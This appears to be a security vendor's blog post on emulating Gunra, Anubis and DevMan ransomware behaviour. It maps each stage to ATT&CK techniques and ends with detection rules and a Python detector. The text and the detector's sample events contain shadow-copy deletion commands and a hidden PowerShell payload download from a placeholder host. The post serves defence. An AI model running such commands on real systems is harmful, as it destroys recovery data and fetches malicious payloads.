On July 22, 2025, AttackIQ introduced Ransom Tales, an initiative focused on routinely emulating the Tactics, Techniques, and Procedures (TTPs) associated with the prolific ransomware families currently dominating the threat landscape. Each volume in this series is designed to dissect the operational behaviors of multiple ransomware families and translate them into realistic emulations that defenders can employ to rigorously challenge their security controls and enhance resilience against disruptive and extortive threats.
In this second volume, AttackIQ presents three new attack graphs that emulate the Tactics, Techniques and Procedures (TTPs) associated with the Gunra, Anubis and DevMan ransomware families with the objective of assisting customers in validating their security controls and their ability to defend against these disruptive and extortive threats.
Validating your security program performance against these behaviors is vital in reducing risk. By employing these assessment templates in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against baseline behaviors associated with prolific and sophisticated ransomware strains.
- Assess their security posture against opportunistic and financially motivated adversaries that do not discriminate when selecting their targets.
- Continuously validate detection and prevention pipelines against a playbook similar to those of many of the adversaries currently focused on ransomware activities.
[Malware Emulation] Gunra Ransomware – 2025-05 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of Gunra ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.
Gunra is a ransomware strain that emerged in April 2025. Developed in C/C++ and derived from the leaked Conti ransomware source code, it has since compromised numerous high-profile organizations worldwide. Its operators target a diverse range of industries, including real estate, pharmaceuticals, and manufacturing, with confirmed victims in Japan, Egypt, Panama, Italy, and Argentina.
Designed to infect Windows environments, Gunra exhibits a comprehensive set of capabilities designed to maximize impact and minimize detection. It is capable of retrieving system information, traversing the file system, enumerating running processes, and deleting shadow copies using Windows Management Instrumentation (WMI). Its evasion techniques include debugger detection, obfuscation to conceal malicious behavior, and avoidance of rule-based detection systems.
Gunra is also known for its aggressive double-extortion strategy. After exfiltrating and encrypting sensitive information, the group threatens to publish the stolen information on a Tor-hosted Dedicated Leak Site (DLS), applying further pressure on victims to meet ransom demands.
Initial Access & Discovery – Gunra Ransomware Deployment and Environment Reconnaissance

This stage begins with the deployment of the Gunra ransomware, which, once operational, checks for the presence of a debugger, retrieves general system information, and enumerates running processes via Windows API. It also retrieves the MachineGUID by querying the Windows Registry.
Ingress Tool Transfer (T1105): This scenario downloads the sample to memory and saves it to disk, as two independent scenarios, to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Virtualization/Sandbox Evasion (T1497): This scenario will execute the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.
System Information Discovery (T1082): This scenario executes the GetNativeSystemInfo Native API call to retrieve information associated with the system.
Query Registry (T1012): This scenario queries the MachineGUID value located within the HKLM\SOFTWARE\Microsoft\Cryptography registry key which contains the unique identifier of the system.
Process Discovery (T1057): This scenario uses the Windows API to retrieve a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.
Impact – Gunra Ransomware Encryption

This stage begins with the enumeration of available drives via the GetLogicalDrives API, followed by systematic traversal using the FindFirstFileW and FindNextFileW APIs to locate files of interest. Once completed, Volume Shadow Copies are deleted using a Windows Management Instrumentation (WMI) command or alternatively through a WMI Object. Finally, it encrypts the identified files using a combination of ChaCha20 for file encryption with RSA-4096 for key encryption.
System Information Discovery (T1082): This scenario executes the GetLogicalDriveStringsW Windows API call to retrieve information regarding the system’s physical drives.
File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows API calls to perform the enumeration of the file system.
Inhibit System Recovery (T1490): This scenario executes the wmic shadowcopy delete command to delete a Volume Shadow Copy created by the emulation.
Inhibit System Recovery (T1490): This scenario executes the Get-WMIObject Win32_ShadowCopy PowerShell command to delete a Volume Shadow Copy created by the assessment template.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by Gunra ransomware.
[Malware Emulation] Anubis Ransomware – 2025-06 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of Anubis ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.
Anubis is a ransomware strain operated under a Ransomware-as-a-Service (RaaS) model that emerged in early 2025. What distinguishes Anubis from other RaaS operations is its combination of file encryption with destructive capabilities, specifically, the deliberate wiping of directories to sabotage recovery efforts. This additional layer of destruction significantly reduces the probability of successfully restoring files and intensifies the pressure on victims, increasing the consequences of an otherwise damaging breach.
In December 2024, researchers identified a ransomware sample named “Sphinx,” which appeared to be in development. Its ransom note lacked both a TOR site and a unique victim ID, suggesting it was not yet operational. A comparative analysis of the Sphinx and Anubis binaries revealed near-identical codebases, with the only notable difference being the function responsible for generating the ransom note. These findings suggest that while the codebase of the ransomware remained the same, the messaging and branding were finalized shortly before its eventual debut as Anubis.
Discovery & Impact – Anubis Ransomware Deployment and File Encryption
This stage begins with the deployment of Anubis ransomware, which, once operational, invokes the AdjustTokenPrivileges API to enable the SeDebugPrivilege, elevating its ability to interact with and manipulate processes running under higher-privileged contexts, regardless of access control restrictions.
It then retrieves general system information via the GetSystemInfo and GetNativeSystemInfo APIs and enumerates running processes via the CreateToolhelp32Snapshot, Process32First, and Process32Next APIs.
Next, it deletes Volume Shadow Copies through vssadmin.exe. Finally, it encrypts files using a combination of ChaCha20 for file encryption and Elliptic-Curve Cryptography (ECC) via Curve25519 for key encryption.
Ingress Tool Transfer (T1105): This scenario downloads the sample to memory and saves it to disk, as two independent scenarios, to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Access Token Manipulation (T1134): This scenario enables the SeDebugPrivilege privilege for the current process using the AdjustTokenPrivileges Windows API.
System Information Discovery (T1082): This scenario executes the GetSystemInfo Native API call to retrieve information associated with the system.
System Information Discovery (T1082): This scenario executes the GetNativeSystemInfo Native API call to retrieve information associated with the system.
Process Discovery (T1057): This scenario uses the Windows API to retrieve a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.
Inhibit System Recovery (T1490): This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by Anubis ransomware.
[Malware Emulation] DevMan Ransomware – 2025-07 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of DevMan ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.
DevMan is a ransomware strain that has been active since at least 2025. It operates its own Dedicated Leak Site (DLS), Devman’s Place, and since its emergence has claimed responsibility for nearly 40 victims, primarily located in Asia and Africa, with sporadic targeting in Latin America and Europe.
DevMan is derived from DragonForce ransomware, a Ransomware-as-a-Service (RaaS) platform that enables affiliates to generate customized variants. This model likely facilitated the emergence of DevMan, which, although based on DragonForce, has been significantly customized and repackaged by its operators.
While multiple security controls flag DevMan samples as DragonForce or even Conti, behavioral analysis reveals unique characteristics that support its classification as a standalone strain. Notably, DevMan exhibits no Command and Control (C2) communication during execution, aside from limited Server Message Block (SMB) probing activity, suggesting an offline-oriented operation model. It supports three encryption modes (full, header-only, and custom), granting its operators flexible control over execution speed during a compromise.
DragonForce, a ransomware strain operated under the Ransomware-as-a-Service (RaaS) business model that emerged in August 2023, has been previously emulated by AttackIQ on May 23, 2025. Originally identified as a pro-Palestine hacktivist operation, the group has since evolved into a hybrid adversary, blending political motives with a clear focus on financial extortion. Despite its ideological roots, the group increasingly prioritizes profit while continuing to target government organizations.
Initial Access & Discovery – DevMan Ransomware Deployment and Preliminary Environment Reconnaissance

This stage begins with the deployment of the DevMan ransomware, which, once operational, attempts to detect the presence of a debugger by invoking the IsDebuggerPresent Windows API. If no debugging environment is detected, it proceeds to determine the system location by invoking the EnumSystemLocalesW, GetLocaleInfoW, GetUserDefaultLCID, and GetACP APIs.
Ingress Tool Transfer (T1105): This scenario downloads the sample to memory and saves it to disk, as two independent scenarios, to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Virtualization/Sandbox Evasion (T1497): This scenario will execute the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.
System Location Discovery (T1614): This scenario executes the EnumSystemLocalesW Windows API to enumerate the locales installed on or supported by the operating system.
System Location Discovery (T1614): This scenario executes the GetLocaleInfoW Windows API to retrieve the user’s default country locale code from the system.
System Location Discovery (T1614): This scenario executes the GetUserDefaultLCID Windows API to retrieve the user default locale ID from the system.
System Location Discovery (T1614): This scenario executes the GetACP Windows API to retrieve the current Windows ANSI code page identifier for the operating system.
Discovery – Local System Reconnaissance

This stage begins with the retrieval of general system information via the GetNativeSystemInfo API, followed by the inspection of the operating system’s access tokens through the GetTokenInformation API. It then retrieves the MachineGUID by querying the Windows Registry.
Subsequently, it enumerates running processes using a combination of the CreateToolhelp32Snapshot, Process32First, and Process32Next APIs. To gather detailed process information, it invokes the NtQuerySystemInformation API.
System Information Discovery (T1082): This scenario executes the GetNativeSystemInfo Native API call to retrieve information associated with the system.
System Information Discovery (T1082): This scenario executes the GetTokenInformation Windows API call to retrieve information regarding the access token of the current process.
Query Registry (T1012): This scenario queries the MachineGUID value located within the HKLM\SOFTWARE\Microsoft\Cryptography registry key which contains the unique identifier of the system.
Process Discovery (T1057): This scenario uses the Windows API to retrieve a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.
System Information Discovery (T1082): This scenario executes NtQuerySystemInformation API with the SystemProcessInformation argument to enumerate system processes.
Impact – DevMan Ransomware Encryption

This stage begins with the enumeration of available drives by invoking the GetLogicalDriveStringsW API, followed by the retrieval of drive-specific information using DeviceIoControl with the IOCTL_STORAGE_QUERY_PROPERTY argument.
Subsequently, each identified drive is recursively traversed using the FindFirstFileW and FindNextFileW APIs to locate files of interest. Once completed, Volume Shadow Copies are deleted via a Windows Management Instrumentation (WMI) command. Finally, it encrypts the identified files using a combination of ChaCha8 for file encryption and RSA-1024 for key encryption.
System Information Discovery (T1082): This scenario executes the GetLogicalDriveStringsW Windows API call to retrieve information regarding the system’s physical drives.
System Information Discovery (T1082): This scenario executes the DeviceIoControl API with the IOCTL_STORAGE_QUERY_PROPERTY argument to retrieve system drive information, such as the serial number, to profile the target’s system.
File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows API calls to perform the enumeration of the file system.
Inhibit System Recovery (T1490): This scenario executes the wmic shadowcopy delete command to delete a Volume Shadow Copy created by the emulation.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by DevMan ransomware.
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by these threats, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Ingress Tool Transfer (T1105):
Adversaries depend on the deployment of payloads, often across multiple stages, within targeted environments to achieve their objectives. Given this dependency, it is essential to employ both Endpoint and Network security controls to detect and block these throughout the multiple phases of delivery and execution.
1a. Detection
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")
1b. Mitigation
MITRE ATT&CK has the following mitigation recommendations.
2. Inhibit System Recovery (T1490):
Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.
2a. Detection
Deletion of Volume Shadow Copies is usually the first of these steps to occur, and it can be detected by looking at command-line activity:
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ("vssadmin" AND "Delete Shadows")
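The two command-line signatures above (1a for T1105 and 2a for T1490) are written in a SIEM-style pseudo-language. The following is an added example, not AttackIQ code, that turns both into executable rules and runs them over constructed process-creation events. The ProcessEvent fields and sample command lines are assumptions modelled on Sysmon Event ID 1 / Security 4688 style records; the T1490 rule is also extended, as an assumption, to cover the wmic shadowcopy delete and Get-WMIObject Win32_ShadowCopy procedures that the Gunra and DevMan emulations exercise, and to match the vssadmin.exe and wmic.exe processes themselves rather than only the shell that launched them.

```python
"""Evaluate the T1105 and T1490 command-line signatures from the Detection section
over constructed process-creation events.  Added example, not AttackIQ code."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    process_name: str   # image file name of the new process, e.g. "powershell.exe"
    command_line: str   # full command line as logged (assumed field layout)


# Native shells the page's signatures key on ("Process Name == cmd.exe OR powershell.exe").
SHELLS = {"cmd.exe", "powershell.exe"}
# Assumption: also match the utilities themselves, so a deletion launched from a
# script host other than cmd/powershell still fires on the child process event.
VSS_UTILITIES = {"vssadmin.exe", "wmic.exe"}


def _has(cl: str, *terms: str) -> bool:
    """Case-insensitive CONTAINS for every term, mirroring the signature's AND."""
    return all(t.lower() in cl for t in terms)


def is_ingress_tool_transfer(ev: ProcessEvent) -> bool:
    """T1105: (IWR OR Invoke-WebRequest) AND DownloadData AND Hidden, from a native shell."""
    if ev.process_name.lower() not in SHELLS:
        return False
    cl = ev.command_line.lower()
    # \biwr\b instead of bare CONTAINS so 'iwr' inside an unrelated token does not fire.
    has_download_cmdlet = bool(re.search(r"\biwr\b", cl)) or "invoke-webrequest" in cl
    return has_download_cmdlet and _has(cl, "DownloadData", "Hidden")


def is_shadow_copy_deletion(ev: ProcessEvent) -> bool:
    """T1490: the page's 'vssadmin AND Delete Shadows' rule, extended (assumption) with
    the wmic shadowcopy delete and Win32_ShadowCopy .Delete() procedures."""
    name = ev.process_name.lower()
    if name not in SHELLS and name not in VSS_UTILITIES:
        return False
    # Collapse whitespace so "delete   shadows" still matches the two-word term.
    cl = re.sub(r"\s+", " ", ev.command_line.lower())
    if _has(cl, "vssadmin", "delete shadows"):
        return True
    # Covers both "wmic shadowcopy delete" and "Get-WmiObject Win32_ShadowCopy | ... .Delete()".
    return _has(cl, "shadowcopy", "delete")


def triage(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Return (event index, ATT&CK technique id) for every event that fires a signature."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        if is_ingress_tool_transfer(ev):
            hits.append((i, "T1105"))
        if is_shadow_copy_deletion(ev):
            hits.append((i, "T1490"))
    return hits


# Constructed sample events (not captured from a real incident); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    ProcessEvent("powershell.exe",
                 "powershell.exe -WindowStyle Hidden -c \"$r = IWR http://example.invalid/p.bin; "
                 "[IO.File]::WriteAllBytes('p.bin', (New-Object Net.WebClient)"
                 ".DownloadData('http://example.invalid/p.bin'))\""),
    ProcessEvent("cmd.exe", "cmd.exe /c vssadmin delete shadows /all /quiet"),
    ProcessEvent("wmic.exe", "wmic shadowcopy delete"),
    ProcessEvent("powershell.exe",
                 "powershell -c \"Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }\""),
    # Benign: a visible download with -OutFile, no DownloadData and no Hidden window.
    ProcessEvent("powershell.exe",
                 "powershell -c \"Invoke-WebRequest https://example.invalid/report.csv -OutFile r.csv\""),
    # Benign: shadow copy enumeration only.
    ProcessEvent("cmd.exe", "cmd.exe /c vssadmin list shadows"),
]

if __name__ == "__main__":
    for idx, technique in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {technique}  {SAMPLE_EVENTS[idx].command_line[:70]}")
```

Running the block reports events 0 (T1105), 1, 2 and 3 (T1490) and leaves the two benign events silent. The page's signatures only examine the cmd.exe and powershell.exe processes, so a deletion spawned by another parent would be missed unless the child utility is also matched, which is why VSS_UTILITIES is included here; the "Hidden" term in the T1105 rule likewise means a download run in a visible window is not flagged by that rule alone.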
2b. Mitigation
MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery:
Wrap-up
In summary, these emulations will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by Gunra, Anubis and DevMan ransomware operators. With data generated from continuous testing and use of these assessment templates, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.
